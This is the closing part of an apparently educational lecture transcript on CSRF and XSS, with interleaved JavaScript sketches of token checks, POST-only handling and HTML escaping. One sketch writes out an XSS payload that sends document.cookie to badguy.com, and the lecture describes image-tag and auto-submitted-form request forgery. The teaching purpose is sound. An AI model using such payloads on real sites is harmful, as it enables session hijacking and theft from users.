01:18:28,676 --> 01:18:32,006
into his link the same
identifier that Jack was handed.

1811
01:18:32,006 --> 01:18:33,056
And if the number
is long enough,

1812
01:18:33,056 --> 01:18:35,286
there's no way statistically
that's going to happen.

1813
01:18:35,286 --> 01:18:36,976
So that can help
ward off the threat.
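
One way the random-token idea might look, sketched in JavaScript with Node's built-in crypto module instead of PHP sessions. The `session` object stands in for whatever per-user storage the server keeps, and the names `issueToken` and `isValidToken` are hypothetical.

```javascript
const crypto = require("crypto");

// Generates a long random token and remembers it in the user's session.
function issueToken(session) {
  session.csrfToken = crypto.randomBytes(32).toString("hex");
  return session.csrfToken;
}

// Accepts a request only if it carries the token this session was given.
function isValidToken(session, submitted) {
  if (typeof session.csrfToken !== "string" || typeof submitted !== "string") {
    return false;
  }
  const expected = Buffer.from(session.csrfToken);
  const actual = Buffer.from(submitted);
  // timingSafeEqual requires equal lengths, so check that first.
  return expected.length === actual.length &&
         crypto.timingSafeEqual(expected, actual);
}

const session = {};
const token = issueToken(session);
console.log(isValidToken(session, token));      // true
console.log(isValidToken(session, "a guess"));  // false
```

A link hard-coded into a spam email or a bad guy's page cannot contain this value, because it is generated per session and never shown to him.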

1814
01:18:37,516 --> 01:18:45,736
[ Inaudible Speaker ]

1815
01:18:46,236 --> 01:18:46,906
Okay.

1816
01:18:47,516 --> 01:18:53,546
[ Inaudible Speaker ]

1817
01:18:54,046 --> 01:18:54,776
Ah, a really good thought.

1818
01:18:54,776 --> 01:18:56,396
So among the HTTP headers

1819
01:18:56,956 --> 01:19:01,326
that a browser typically sends
there's one called the referer

1820
01:19:01,536 --> 01:19:03,146
header, which specifies,

1821
01:19:03,536 --> 01:19:07,496
I came from this URL
recently, and this is useful.

1822
01:19:07,496 --> 01:19:09,356
This is how things like
Google Analytics figure

1823
01:19:09,356 --> 01:19:11,786
out where you're coming
from when you get to a page.

1824
01:19:11,786 --> 01:19:13,696
They can tell you that you came
from the Google, or the like.

1825
01:19:14,056 --> 01:19:17,706
But the catch with this
HTTP referer header is

1826
01:19:17,736 --> 01:19:19,256
that it's not guaranteed
to exist.

1827
01:19:19,556 --> 01:19:22,316
It's a nice feature that
most browsers honor,

1828
01:19:22,556 --> 01:19:24,406
but if you're one of
these paranoid types,

1829
01:19:24,406 --> 01:19:26,376
or you are behind
a corporate firewall

1830
01:19:26,376 --> 01:19:27,996
that scrubs certain information,

1831
01:19:27,996 --> 01:19:31,636
the HTTP referer header is not
required for correct behavior

1832
01:19:31,636 --> 01:19:34,936
of a browser, so
privacy scraping tools --

1833
01:19:34,936 --> 01:19:37,536
privacy scrubbing tools
could remove it altogether.

1834
01:19:37,876 --> 01:19:39,806
And it's just not always sent,

1835
01:19:39,896 --> 01:19:41,326
depending on how
you visited the URL

1836
01:19:41,326 --> 01:19:42,896
or you open a new
tab or the like.

1837
01:19:42,896 --> 01:19:45,306
So not bad, it raises
the bar a bit,

1838
01:19:45,856 --> 01:19:47,976
but it's not a sufficiently
reliable mechanism.

1839
01:19:47,976 --> 01:19:50,786
It's not going to keep your
purchases super secure.
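
For illustration, a referer check could be sketched like this in JavaScript. The function name `refererLooksTrusted` and the page name in the example are assumptions; the header itself really is spelled "referer". Note the awkward choice it forces: rejecting requests with no header locks out legitimate users whose browser or firewall strips it, while accepting them defeats the check.

```javascript
// Returns true only when a Referer header is present and points at
// the trusted origin. headers is assumed to use lowercase keys.
function refererLooksTrusted(headers, trustedOrigin) {
  const referer = headers["referer"];
  if (!referer) {
    return false; // header missing: cannot tell where the request came from
  }
  try {
    return new URL(referer).origin === trustedOrigin;
  } catch (err) {
    return false; // header present but not a valid URL
  }
}

const trusted = "http://project2.domain.tld";
console.log(refererLooksTrusted({ referer: trusted + "/index.php" }, trusted)); // true
console.log(refererLooksTrusted({ referer: "http://evil.example/" }, trusted)); // false
console.log(refererLooksTrusted({}, trusted));                                  // false
```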

1840
01:19:51,806 --> 01:19:55,206
So one problem, too, seems to
be we're using what method here

1841
01:19:55,756 --> 01:19:56,516
for the stock purchase?

1842
01:19:56,516 --> 01:19:56,696
Ben?

1843
01:19:56,696 --> 01:19:57,276
[ Inaudible Speaker ]

1844
01:19:57,276 --> 01:19:59,936
Okay, so what's an
obvious alternative, then?

1845
01:20:00,516 --> 01:20:07,546
[ Inaudible Speaker ]

1846
01:20:08,046 --> 01:20:08,386
Okay, good.

1847
01:20:08,386 --> 01:20:10,616
So if you use POST
instead, you don't just have

1848
01:20:10,616 --> 01:20:12,656
to trick the user into clicking
the link, you have to trick them

1849
01:20:12,656 --> 01:20:16,676
into filling out a form,
at least clicking a button.
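
A minimal sketch, in JavaScript, of a purchase handler that refuses anything but POST. The handler name `handleBuy` and the shape of its return value are hypothetical. This only raises the bar; it does nothing against a form submitted by script.

```javascript
// Hypothetical handler for the buy action: state-changing requests
// are accepted only via POST, so a plain link or image URL (GET) fails.
function handleBuy(method, params) {
  if (method !== "POST") {
    return { status: 405, headers: { Allow: "POST" }, body: "Method Not Allowed" };
  }
  return { status: 200, headers: {}, body: "Bought 1 share of " + params.symbol };
}

console.log(handleBuy("GET", { symbol: "INFX.PK" }).status);  // 405
console.log(handleBuy("POST", { symbol: "INFX.PK" }).status); // 200
```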

1850
01:20:16,676 --> 01:20:16,926
Axle?

1851
01:20:17,516 --> 01:20:29,936
[ Inaudible Speaker ]

1852
01:20:30,436 --> 01:20:30,946
Good.

1853
01:20:31,516 --> 01:20:33,986
[ Inaudible Speaker ]

1854
01:20:34,486 --> 01:20:35,776
Good. So that's the catch.

1855
01:20:35,776 --> 01:20:38,816
So this does raise the bar, and
you've just protected yourself

1856
01:20:38,816 --> 01:20:41,176
against the less
intelligent of adversaries.

1857
01:20:41,466 --> 01:20:44,276
But we saw the other day how
you can register event handlers

1858
01:20:44,276 --> 01:20:46,666
[inaudible] that
prevents form submission.

1859
01:20:46,906 --> 01:20:49,916
Turns out in JavaScript
there's a function called submit

1860
01:20:49,916 --> 01:20:53,446
that you can call to actually
submit a form via code.

1861
01:20:53,716 --> 01:20:54,756
So all you've done here, too,

1862
01:20:54,756 --> 01:20:56,156
is you've made it a
little harder for them.

1863
01:20:56,156 --> 01:20:58,306
You've tried -- now the
user has to fill out a --

1864
01:20:58,306 --> 01:21:00,636
has to submit a form
by clicking a button.

1865
01:21:01,006 --> 01:21:02,306
But, again, with JavaScript,

1866
01:21:02,306 --> 01:21:04,116
and almost everyone
has JavaScript enabled,

1867
01:21:04,116 --> 01:21:06,676
a user could visit a page, there
could be a hidden form there,

1868
01:21:06,906 --> 01:21:08,366
and they're tricked
into submitting it

1869
01:21:08,406 --> 01:21:10,496
because there's a JavaScript
function that just says,

1870
01:21:10,786 --> 01:21:14,056
when the DOM is loaded, submit
this form automatically.

1871
01:21:14,056 --> 01:21:18,306
So it raises the bar, helps
maybe with emails a little bit,

1872
01:21:18,826 --> 01:21:21,576
but not all of the
possible attacks.

1873
01:21:21,956 --> 01:21:23,546
And in fact it's a
little scarier than this.

1874
01:21:23,596 --> 01:21:26,106
Even though I chose this
example of, like, a spam email

1875
01:21:26,236 --> 01:21:27,916
or the user visiting the URL,

1876
01:21:28,246 --> 01:21:30,006
take a look at these
other possible attacks.

1877
01:21:30,346 --> 01:21:34,126
Suppose you just happen to visit
a website that has an image

1878
01:21:34,126 --> 01:21:37,706
in it, a script tag, an
iframe, another JavaScript tag

1879
01:21:37,706 --> 01:21:41,166
with some code, you can trick
the user to visiting URL

1880
01:21:41,166 --> 01:21:43,266
in so many different
ways, right,

1881
01:21:43,306 --> 01:21:44,896
simply by including
an image tag,

1882
01:21:44,896 --> 01:21:46,166
that's maybe the simplest one.

1883
01:21:46,386 --> 01:21:47,926
And notice this is kind of weird

1884
01:21:48,076 --> 01:21:51,006
in that I'm saying the image
is the URL of the buy.php,

1885
01:21:51,006 --> 01:21:54,416
but it's not a big deal if
that doesn't actually return an

1886
01:21:54,416 --> 01:21:54,966
image, right?

1887
01:21:54,966 --> 01:21:57,076
It's going to return a broken
icon or something like that,

1888
01:21:57,076 --> 01:21:58,686
but who cares, I
just tricked the user

1889
01:21:58,686 --> 01:22:00,466
into buying the stock already.

1890
01:22:00,726 --> 01:22:04,126
So realize that you don't
even have to be overtly trying

1891
01:22:04,126 --> 01:22:06,606
to trick the user into clicking
a link, you can trick them

1892
01:22:06,606 --> 01:22:09,666
into sending an HTTP
request from their browser

1893
01:22:09,666 --> 01:22:13,026
or their mail client just
by hard coding the URL.

1894
01:22:13,186 --> 01:22:15,906
So now POST would help with
these attacks in particular,

1895
01:22:16,226 --> 01:22:19,646
but not in the case of a
browser supporting JavaScript.

1896
01:22:20,456 --> 01:22:24,696
So how can we really
fix this, then?

1897
01:22:24,906 --> 01:22:26,396
It's not sufficient
just to use POST.

1898
01:22:26,706 --> 01:22:29,186
I claim it's not sufficient
to rely on the referer header,

1899
01:22:29,186 --> 01:22:30,206
because it's not always there.

1900
01:22:30,206 --> 01:22:32,216
It might help, but
not sufficient.

1901
01:22:32,396 --> 01:22:34,376
POST doesn't seem to
do it fully for us.

1902
01:22:34,506 --> 01:22:36,766
The random numbers, not bad,
actually, that's probably one

1903
01:22:36,766 --> 01:22:38,416
of the most solid
solutions thus far

1904
01:22:38,416 --> 01:22:41,386
because it requires
server side cooperation.

1905
01:22:41,536 --> 01:22:41,866
Axle?

1906
01:22:42,516 --> 01:22:57,716
[ Inaudible Speaker ]

1907
01:22:58,216 --> 01:22:58,486
Okay.

1908
01:22:58,486 --> 01:22:59,206
[ Inaudible Speaker ]

1909
01:22:59,206 --> 01:22:59,976
Okay. Good.

1910
01:23:00,516 --> 01:23:05,396
[ Inaudible Speaker ]

1911
01:23:05,896 --> 01:23:06,286
Good.

1912
01:23:06,286 --> 01:23:06,396
[ Inaudible Speaker ]

1913
01:23:06,396 --> 01:23:09,816
Okay, so a slight
variant on Jack's idea.

1914
01:23:09,816 --> 01:23:11,156
This time you have
a hidden form field

1915
01:23:11,156 --> 01:23:13,426
that contains some
server generated token

1916
01:23:13,696 --> 01:23:16,786
that it can validate somehow
so that if it doesn't get

1917
01:23:16,786 --> 01:23:19,696
that same token, it knows
that this is a forged buy.

1918
01:23:20,236 --> 01:23:21,186
So that's not bad.

1919
01:23:21,186 --> 01:23:22,136
That, too, is solid.
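
The hidden-field variant might be rendered along these lines, sketched in JavaScript. The field name `token` and the function names are assumptions; the server would compare the submitted value against the one it stored for that user's session before buying anything.

```javascript
// Escapes characters that are special in HTML so values cannot
// break out of the attribute they are placed in.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Renders the buy form with the server-generated token in a hidden field.
function renderBuyForm(symbol, csrfToken) {
  return [
    '<form action="buy.php" method="post">',
    '  <input type="hidden" name="token" value="' + escapeHtml(csrfToken) + '">',
    '  <input type="hidden" name="symbol" value="' + escapeHtml(symbol) + '">',
    '  <input type="submit" value="Buy">',
    '</form>',
  ].join("\n");
}

console.log(renderBuyForm("INFX.PK", "abc123"));
```

A forged form on the bad guy's page can copy everything here except the token value, which is what lets the server spot the forgery.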

1920
01:23:22,626 --> 01:23:25,886
What is -- if you've ever
bought something from Amazon,

1921
01:23:25,886 --> 01:23:32,866
what does Amazon ask you to
do before you buy something?

1922
01:23:33,486 --> 01:23:33,576
Yeah?

1923
01:23:34,516 --> 01:23:37,586
[ Inaudible Speaker ]

1924
01:23:38,086 --> 01:23:38,646
Okay, so CAPTCHAs.

1925
01:23:38,646 --> 01:23:38,976
What's a CAPTCHA?

1926
01:23:39,516 --> 01:23:45,636
[ Inaudible Speaker ]

1927
01:23:46,136 --> 01:23:47,856
Okay, but what does that mean?

1928
01:23:48,696 --> 01:23:50,826
>> It's a -- generally an image

1929
01:23:51,226 --> 01:23:54,306
that computers have a
hard time figuring out.

1930
01:23:54,716 --> 01:23:56,386
It's distorted text --

1931
01:23:56,386 --> 01:23:56,946
>> Okay, good.

1932
01:23:56,996 --> 01:23:57,386
>> -- generally.

1933
01:23:57,626 --> 01:24:00,766
And for -- for [inaudible]
it's really hard

1934
01:24:00,856 --> 01:24:04,046
to see what it actually says,

1935
01:24:04,656 --> 01:24:06,636
but for you it's
really easy [inaudible].

1936
01:24:07,246 --> 01:24:12,336
So [inaudible] spend time
[inaudible] can't have

1937
01:24:12,676 --> 01:24:13,166
[inaudible] because [inaudible].

1938
01:24:13,166 --> 01:24:19,166
But [inaudible] buy stock,
it's going to go, okay,

1939
01:24:19,546 --> 01:24:23,476
[inaudible] five
letters and five numbers.

1940
01:24:23,566 --> 01:24:23,766
>> Perfect.

1941
01:24:24,096 --> 01:24:31,526
Yeah, and so you just --
you put a bump in the road,

1942
01:24:31,786 --> 01:24:36,266
so that even though the
user could be tricked

1943
01:24:36,266 --> 01:24:39,086
into visiting your webpage,
either behind the scenes

1944
01:24:39,086 --> 01:24:41,976
with a tag like these, the
image tag, or explicitly

1945
01:24:41,976 --> 01:24:44,476
by a link they click in
an email or in a website

1946
01:24:44,476 --> 01:24:45,966
that they visited or redirect.

1947
01:24:46,186 --> 01:24:49,396
Before the buy.php
actually buys the stock,

1948
01:24:49,616 --> 01:24:51,836
it shows the user a
CAPTCHA, a thing like,

1949
01:24:52,096 --> 01:24:54,316
please type in the
following word that you see,

1950
01:24:54,546 --> 01:24:57,996
just to raise the bar so
that the user now kind

1951
01:24:58,246 --> 01:25:00,256
of has to be not so sharp.

1952
01:25:00,416 --> 01:25:02,456
If they're like, okay,
I'll fill out this form,

1953
01:25:02,456 --> 01:25:05,096
even though that form says
to buy this stock fill

1954
01:25:05,096 --> 01:25:06,706
out this form, or
fill out this CAPTCHA.

1955
01:25:06,996 --> 01:25:08,446
And similarly we
could do something

1956
01:25:08,446 --> 01:25:11,306
like Amazon does itself,

1957
01:25:11,376 --> 01:25:12,826
they just prompt the
user to re-login.

1958
01:25:13,136 --> 01:25:15,116
So even if you're logged
into your Amazon account

1959
01:25:15,186 --> 01:25:17,216
and are browsing and
adding things to your cart,

1960
01:25:17,426 --> 01:25:20,576
the moment you click check
out, even if you just logged

1961
01:25:20,576 --> 01:25:23,296
in a minute ago, they
prompt you to login again,

1962
01:25:23,666 --> 01:25:27,026
putting that bump in the road so
that the user has to demonstrate

1963
01:25:27,286 --> 01:25:30,176
that it's indeed me and not some
bad guy that just tricked me

1964
01:25:30,176 --> 01:25:31,546
into visiting the checkout line.

1965
01:25:31,546 --> 01:25:33,786
And that's particularly
important for Amazon

1966
01:25:33,786 --> 01:25:36,576
because they have this
patented feature that does what?

1967
01:25:37,046 --> 01:25:40,866
One-click shopping.

1968
01:25:41,666 --> 01:25:43,026
All right, one-click,
kind of bad, right?

1969
01:25:43,026 --> 01:25:45,846
If you can buy a stock or
buy a book or buy a TV

1970
01:25:45,846 --> 01:25:48,796
with one click, you better
be sure that it's the user

1971
01:25:48,796 --> 01:25:51,516
who has clicked and they
haven't been duped by one

1972
01:25:51,516 --> 01:25:53,536
of these various techniques.

1973
01:25:54,456 --> 01:25:55,936
And lastly, XSS.

1974
01:25:56,496 --> 01:25:58,676
So this one we've talked
about, but let's take a look

1975
01:25:58,676 --> 01:25:59,766
at a concrete example.

1976
01:25:59,766 --> 01:26:03,806
So this URL's unfortunately
a little long and small,

1977
01:26:03,806 --> 01:26:05,166
but demonstrates the idea.

1978
01:26:05,166 --> 01:26:06,196
So let me zoom in.

1979
01:26:06,656 --> 01:26:10,166
So suppose in this scenario
you happen to click on a link

1980
01:26:10,236 --> 01:26:14,216
that goes to vulnerable.com,
literally, and foo equals

1981
01:26:14,216 --> 01:26:15,856
and then some crazy
looking script tag.

1982
01:26:16,116 --> 01:26:18,396
Now, generally the script
tag would not be written

1983
01:26:18,396 --> 01:26:20,686
as a script tag, it would
be something cryptic looking

1984
01:26:20,686 --> 01:26:23,116
like this with percent
signs, because, recall, PHP

1985
01:26:23,116 --> 01:26:25,466
and other languages
have a urlencode function

1986
01:26:25,706 --> 01:26:28,236
that takes potentially
dangerous characters and spaces

1987
01:26:28,236 --> 01:26:31,206
and URL-encodes them
using percent signs and numbers

1988
01:26:31,586 --> 01:26:33,266
to make sure that
it's all one string,

1989
01:26:33,266 --> 01:26:35,126
with no spaces or
breakages in it.

1990
01:26:35,616 --> 01:26:37,146
But just so we can
talk about it,

1991
01:26:37,316 --> 01:26:39,576
the top is what the
bottom translates to.
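
To make the two forms of the link concrete, here is a small sketch using JavaScript's built-in `encodeURIComponent`, which plays a role similar to PHP's `urlencode` (the two differ in some details, such as how spaces are encoded). The payload string is reconstructed from the spoken description, so its exact text is an assumption rather than a copy of the slide.

```javascript
// Payload reconstructed from the lecture's description; exact wording is an assumption.
const payload =
  "<script>document.location='http://badguy.com/log.php?cookie='+document.cookie</script>";

// Percent-encode the characters that are unsafe inside a query string.
const link = "http://vulnerable.com/?foo=" + encodeURIComponent(payload);
console.log(link);

// Decoding the parameter recovers the original script tag.
const decoded = decodeURIComponent(link.split("foo=")[1]);
console.log(decoded === payload);
```

The encoded link contains no angle brackets at all, which is part of why it looks harmless to someone glancing at it.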

1992
01:26:39,576 --> 01:26:40,966
But what does that do?

1993
01:26:41,136 --> 01:26:42,636
It's a script tag inside

1994
01:26:42,636 --> 01:26:45,046
of which is apparently
some JavaScript code,

1995
01:26:45,246 --> 01:26:47,616
and we didn't see
document.location the other day,

1996
01:26:47,616 --> 01:26:51,846
but document.location
is a property inside

1997
01:26:51,846 --> 01:26:54,476
of the document global
object in JavaScript

1998
01:26:54,756 --> 01:26:56,896
that if you assign
a new URL to it,

1999
01:26:57,476 --> 01:27:00,266
it redirects the
browser to that URL.

2000
01:27:00,266 --> 01:27:03,136
So we saw the redirect
ability of PHP

2001
01:27:03,136 --> 01:27:06,316
by sending the location
header, the [inaudible] header.

2002
01:27:06,466 --> 01:27:08,626
You can also redirect
users in JavaScript

2003
01:27:08,626 --> 01:27:12,866
by setting document.location
or document.location.href,

2004
01:27:12,986 --> 01:27:15,736
more specifically, to another
URL and they'll be whisked away

2005
01:27:15,736 --> 01:27:17,156
as soon as the code executes.

2006
01:27:17,556 --> 01:27:20,416
But in this case the bad guy
is doing something clever,

2007
01:27:20,686 --> 01:27:24,136
he's sending the user to
badguy.com, for clarity,

2008
01:27:24,566 --> 01:27:26,856
/log.php, the idea
being that he's going

2009
01:27:26,856 --> 01:27:28,976
to log whatever he
gets of this file.

2010
01:27:29,276 --> 01:27:32,596
And the argument he's giving
himself is cookie equals the

2011
01:27:33,476 --> 01:27:35,276
[inaudible] of document.cookie.

2012
01:27:35,336 --> 01:27:37,636
We also didn't talk about
this, but it turns out that

2013
01:27:37,636 --> 01:27:40,636
in JavaScript you can also
access cookies; you can set them

2014
01:27:40,636 --> 01:27:42,636
and get them, and
they're all stored

2015
01:27:42,636 --> 01:27:44,606
in an object called
document.cookie.

2016
01:27:44,926 --> 01:27:47,246
So inside this global document
object there's another object

2017
01:27:47,246 --> 01:27:50,026
called cookie and
everything in there is --

2018
01:27:50,266 --> 01:27:52,036
all of the key value
pairs you have

2019
01:27:52,036 --> 01:27:55,116
for this website's
cookies are stored there.
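
One detail worth noting: in browsers, `document.cookie` is exposed as a single string of `name=value` pairs separated by `"; "`, rather than as a nested object. The sketch below parses such a string; the helper name `parseCookies` and the sample values are made up for illustration.

```javascript
// Turn a cookie string like the one in document.cookie into name/value pairs.
function parseCookies(cookieString) {
  const cookies = {};
  for (const pair of cookieString.split("; ")) {
    const index = pair.indexOf("=");
    if (index === -1) continue;            // skip empty or malformed pieces
    cookies[pair.slice(0, index)] = pair.slice(index + 1);
  }
  return cookies;
}

// Made-up sample; in a browser you would pass document.cookie instead.
const sample = "PHPSESSID=abc123; theme=dark";
console.log(parseCookies(sample).PHPSESSID);
```

Any script running in the page can read this string, which is what makes the attack that follows possible.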

2020
01:27:55,446 --> 01:27:56,666
So what's the implication?

2021
01:27:56,666 --> 01:27:58,436
If it's a PHP based
website you're visiting,

2022
01:27:58,716 --> 01:28:00,846
there's at least one cookie
involved [inaudible] sessions

2023
01:28:01,436 --> 01:28:02,856
and that cookie is called what?

2024
01:28:03,516 --> 01:28:07,546
[ Inaudible Speaker ]

2025
01:28:08,046 --> 01:28:10,136
A PHPSESSID, right?

2026
01:28:10,136 --> 01:28:12,786
That big capitalized word we
keep seeing in the headers.

2027
01:28:12,786 --> 01:28:17,236
So PHPSESSID is going to
be present in the memory

2028
01:28:17,236 --> 01:28:19,686
of any browser that's
visited a PHP website

2029
01:28:19,686 --> 01:28:22,216
on which session_start
has been called,

2030
01:28:22,546 --> 01:28:23,646
where sessions are in use.

2031
01:28:23,996 --> 01:28:26,906
So that means in
document.cookie I have access

2032
01:28:26,906 --> 01:28:28,166
to a user's session cookie.

2033
01:28:28,476 --> 01:28:30,736
So what I'm doing here
is constructing a URL,

2034
01:28:30,736 --> 01:28:34,726
badguy.com/log.php cookie
equals document.cookie,

2035
01:28:35,066 --> 01:28:38,036
so that effectively the URL I'm
going to be sending the user

2036
01:28:38,036 --> 01:28:43,496
to is badguy.com/log.php?cookie
equals one, two, three, four,

2037
01:28:43,496 --> 01:28:44,106
five, six, seven, eight,

2038
01:28:44,106 --> 01:28:46,106
whatever the big
random number is

2039
01:28:46,106 --> 01:28:48,046
that is the user's
PHP session ID.

2040
01:28:48,916 --> 01:28:49,986
So what does this mean?

2041
01:28:50,116 --> 01:28:52,476
This is a very sophisticated way

2042
01:28:52,606 --> 01:28:57,746
of sniffing someone's
session cookie, not via WiFi,

2043
01:28:57,746 --> 01:28:59,886
not via a wired Internet
connection.

2044
01:29:00,176 --> 01:29:02,136
In fact, it's doing
it via JavaScript.

2045
01:29:02,136 --> 01:29:03,776
So they could be
anywhere in the world.

2046
01:29:03,896 --> 01:29:05,746
They could be on an encrypted
connection, on a VPN,

2047
01:29:05,746 --> 01:29:10,256
they can have WPA2 installed,
but it doesn't matter

2048
01:29:10,256 --> 01:29:13,446
because JavaScript is as close
to the user as you can get.

2049
01:29:13,446 --> 01:29:15,226
The cookies are unencrypted
at that point,

2050
01:29:15,396 --> 01:29:17,276
they're stored inside
of this container

2051
01:29:17,276 --> 01:29:18,536
called document.cookie.

2052
01:29:18,796 --> 01:29:21,746
So if I trick the user into
executing some JavaScript code,

2053
01:29:21,936 --> 01:29:23,966
that JavaScript code doesn't
have to be something stupid,

2054
01:29:23,966 --> 01:29:26,806
like a few lectures ago where
I just said, alert hello,

2055
01:29:26,956 --> 01:29:29,586
or alert annoy, or
whatever it was, rather,

2056
01:29:29,586 --> 01:29:31,716
it can be something
dangerous like this.

2057
01:29:32,146 --> 01:29:35,976
Because now badguy.com has in
his log file somewhere, what?

2058
01:29:36,016 --> 01:29:38,016
[ Silence ]

2059
01:29:38,016 --> 01:29:40,000
[ Inaudible Speaker ]

2060
01:29:40,046 --> 01:29:41,246
Exactly, someone's cookie value.

2061
01:29:41,246 --> 01:29:43,256
Maybe it's Facebook, maybe
it's Gmail, maybe it's Bank

2062
01:29:43,256 --> 01:29:46,896
of America, something and now he
can presumably take that value

2063
01:29:46,896 --> 01:29:49,626
from his logs and use a
special program that he wrote

2064
01:29:49,626 --> 01:29:53,206
or downloaded and pretend
that that is his own cookie,

2065
01:29:53,406 --> 01:29:55,676
and now he's logged in
as this random person.

2066
01:29:56,196 --> 01:29:59,966
So in the end of the story
-- by the end of the story,

2067
01:30:00,326 --> 01:30:05,046
vulnerable.com has to be flawed,

2068
01:30:05,046 --> 01:30:07,446
it has to be vulnerable
by doing what?

2069
01:30:07,656 --> 01:30:10,256
So step two describes
it, but what do I mean

2070
01:30:10,256 --> 01:30:11,146
by it makes the mistake

2071
01:30:11,146 --> 01:30:13,156
of writing the value
of foo to its body?

2072
01:30:13,686 --> 01:30:13,786
Jack?

2073
01:30:15,516 --> 01:30:21,566
[ Inaudible Speaker ]

2074
01:30:22,066 --> 01:30:22,736
Exactly. Right?

2075
01:30:22,736 --> 01:30:25,886
So just as we did this silly
example a couple lectures ago

2076
01:30:25,886 --> 01:30:28,636
where I tricked the browser
into triggering an alert

2077
01:30:28,636 --> 01:30:30,916
that said hi, or
annoy me, or whatnot,

2078
01:30:31,616 --> 01:30:35,066
if there's a similar form
on vulnerable.com's website,

2079
01:30:35,356 --> 01:30:39,056
and I have tricked it into
pre-populating that form field

2080
01:30:39,676 --> 01:30:41,526
with in this case a script tag,

2081
01:30:41,646 --> 01:30:44,646
because that's what the bad
guy has tried to trick me

2082
01:30:44,646 --> 01:30:47,246
into providing as input,
and you did not only --

2083
01:30:47,436 --> 01:30:51,076
you only called print or echo
or used the equals sign operator,

2084
01:30:51,216 --> 01:30:52,726
you did not use what function?

2085
01:30:53,516 --> 01:30:55,546
[ Inaudible Speaker ]

2086
01:30:56,046 --> 01:30:59,266
Yeah, htmlspecialchars, which
escapes things with ampersands

2087
01:30:59,326 --> 01:31:02,426
and entities and the like
so that they don't execute.

2088
01:31:02,606 --> 01:31:08,236
Well, badguy.com is going to
get your cookies in this case.
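
As a rough illustration of what escaping does, here is a JavaScript sketch that performs broadly the same substitutions as PHP's `htmlspecialchars`. The function name `escapeHtml` is hypothetical, and PHP's exact behavior depends on its flags and version, so treat this as an approximation rather than a reimplementation.

```javascript
// Replace the characters that HTML treats specially with entities.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")   // must come first so later entities are not re-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#039;");
}

const foo = "<script>alert('hi')</script>";
console.log(escapeHtml(foo));
// prints: &lt;script&gt;alert(&#039;hi&#039;)&lt;/script&gt;
```

Written into the page this way, the value of foo shows up as visible text instead of being parsed as a script tag.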

2089
01:31:08,446 --> 01:31:10,816
So what's the key takeaway here?

2090
01:31:10,816 --> 01:31:13,586
How do you protect
yourself against XSS?

2091
01:31:15,046 --> 01:31:15,236
Jack?

2092
01:31:15,236 --> 01:31:15,976
[ Inaudible Speaker ]

2093
01:31:15,976 --> 01:31:19,416
It really is as simple
as that, right?

2094
01:31:19,416 --> 01:31:21,376
Like, the alternative
is, don't click links,

2095
01:31:21,376 --> 01:31:22,906
but that's not going to
happen, users are going to do that.

2096
01:31:22,906 --> 01:31:24,046
And it doesn't even
matter if they click,

2097
01:31:24,046 --> 01:31:26,136
because they can just use
an image tag to trick them.

2098
01:31:26,606 --> 01:31:27,776
Don't trust user input.

2099
01:31:27,776 --> 01:31:29,146
So that's a given, all right.

2100
01:31:29,196 --> 01:31:32,166
So a key theme here with
these latest attacks is,

2101
01:31:32,346 --> 01:31:35,786
you should never trust that
what the user is typing is going

2102
01:31:35,786 --> 01:31:39,656
to be valid, and you should
certainly encode it or escape it

2103
01:31:39,796 --> 01:31:42,466
so that you're warding off
these kinds of attacks.

2104
01:31:43,626 --> 01:31:44,556
All right, because what if --

2105
01:31:44,556 --> 01:31:46,386
and again, just to
emphasize one lesson

2106
01:31:46,386 --> 01:31:47,936
from our JavaScript discussions,

2107
01:31:48,606 --> 01:31:50,956
but this is why we
have form validation.

2108
01:31:50,956 --> 01:31:53,606
Why don't I just check that what
the user is submitting doesn't

2109
01:31:53,606 --> 01:31:55,886
contain the open bracket
or the script tag?

2110
01:31:57,326 --> 01:32:01,796
Why do I also still need to
encode or escape all user input?

2111
01:32:02,516 --> 01:32:13,546
[ Inaudible Speaker ]

2112
01:32:14,046 --> 01:32:14,776
Exactly.

2113
01:32:15,516 --> 01:32:21,196
[ Inaudible Speaker ]

2114
01:32:21,696 --> 01:32:24,866
Exactly. [Inaudible] validation
is not sufficient because it can be

2115
01:32:24,866 --> 01:32:26,986
so easily disabled,
as I did the other day

2116
01:32:26,986 --> 01:32:28,866
by just clicking something,
you can turn it off

2117
01:32:28,866 --> 01:32:31,616
for your entire browser by
some preferences menu, usually,

2118
01:32:31,936 --> 01:32:34,346
or can just write your own
software at a terminal window

2119
01:32:34,346 --> 01:32:35,896
that pretends to be a browser

2120
01:32:36,056 --> 01:32:38,766
and therefore doesn't have any
JavaScript support whatsoever,

2121
01:32:38,766 --> 01:32:40,896
it just makes HTTP requests.

2122
01:32:41,866 --> 01:32:46,696
So there's a whole number of
attacks that we explored today,

2123
01:32:46,696 --> 01:32:49,896
and we've talked about things
here and there over time.

2124
01:32:50,186 --> 01:32:52,246
But ultimately the
lesson really should be,

2125
01:32:52,326 --> 01:32:57,386
never trust the user's input,
and also consider the fact

2126
01:32:57,506 --> 01:33:00,406
that at least one of your users
is going to be some adversary

2127
01:33:00,406 --> 01:33:02,396
or just a little bit
curious as to how your site works

2128
01:33:02,656 --> 01:33:05,276
and you should never just expect
that, you know, users are going

2129
01:33:05,276 --> 01:33:07,196
to behave in the
manner you intend.

2130
01:33:08,356 --> 01:33:09,036
So what remains?

2131
01:33:09,036 --> 01:33:11,076
Thus far we've been using
[inaudible] appliance,

2132
01:33:11,206 --> 01:33:14,476
you've been having probably
one user bang on your website,

2133
01:33:14,476 --> 01:33:16,276
or two, including
your teaching fellow.

2134
01:33:16,506 --> 01:33:18,906
But on Monday what we'll
discuss is scalability

2135
01:33:18,906 --> 01:33:20,196
and how you can actually
take a website

2136
01:33:20,196 --> 01:33:22,746
and not just tolerate dozens
or hundreds or even thousands

2137
01:33:22,746 --> 01:33:24,356
of users, but maybe
tens of thousands.

2138
01:33:24,356 --> 01:33:26,616
And what kinds of design
decisions you can make even

2139
01:33:26,616 --> 01:33:28,506
for the simplest
of projects so that

2140
01:33:28,506 --> 01:33:30,376
if you do have some
happy coincidence

2141
01:33:30,376 --> 01:33:31,806
of becoming popular overnight,

2142
01:33:31,806 --> 01:33:34,806
as some websites these
days have become,

2143
01:33:34,806 --> 01:33:36,866
you at least have designed
things in such a way

2144
